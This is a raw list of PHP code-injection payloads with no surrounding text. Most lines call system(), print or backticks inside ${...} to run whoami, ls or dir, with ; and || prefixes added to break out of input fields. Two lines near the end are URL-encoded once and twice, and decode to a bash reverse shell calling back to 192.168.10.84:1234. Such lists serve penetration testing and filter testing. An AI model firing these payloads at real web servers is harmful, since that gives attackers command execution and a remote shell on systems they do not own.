${`whoami`}
${(@print(system("whoami"))}
${(@print(system("ls%20-la"))}
${(@print(system(`whoami`))}
||${(@print(system("whoami"))}
;${(@print(system("whoami"))}
;%20${(@print(system("whoami"))}
;${(@print(system(`whoami`))}
||${(@print(system(`whoami`))}
;%20${(@print(system(`whoami`))}
;${`whoami`}
||%20${`whoami`}
@print(`whoami`)
@print("whoami")
${@print("whoami")}
${@print(`whoami`)}
${(@print(system(`ls`))}
||${(@print(system("ls"))}
;${(@print(system("ls"))}
;%20${(@print(system("ls"))}
;${(@print(system(`ls`))}
||${(@print(system(`ls`))}
;%20${(@print(system(`ls`))}
;${`ls`}
||%20${`ls`}
@print(`ls`)
@print("ls")
${@print("ls")}
${@print(`ls`)}
${(@print(system(`dir`))}
||${(@print(system("dir"))}
;${(@print(system("dir"))}
;%20${(@print(system("dir"))}
;${(@print(system(`dir`))}
||${(@print(system(`dir`))}
;%20${(@print(system(`dir`))}
;${`dir`}
||%20${`dir`}
@print(`dir`)
@print("dir")
%24%7b%40%70%72%69%6e%74%28%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%2e%38%34%2f%31%32%33%34%20%30%3e%26%31%27%22%29%29%7d
%2524%257b%2540%2570%2572%2569%256e%2574%2528%2573%2579%2573%2574%2565%256d%2528%2522%252f%2562%2569%256e%252f%2562%2561%2573%2568%2520%252d%2563%2520%2527%2562%2561%2573%2568%2520%252d%2569%2520%253e%2526%2520%252f%2564%2565%2576%252f%2574%2563%2570%252f%2531%2539%2532%252e%2531%2536%2538%252e%2531%2530%252e%2538%2534%252f%2531%2532%2533%2534%2520%2530%253e%2526%2531%2527%2522%2529%2529%257d
${@print("dir")}
${@print(`dir`)}

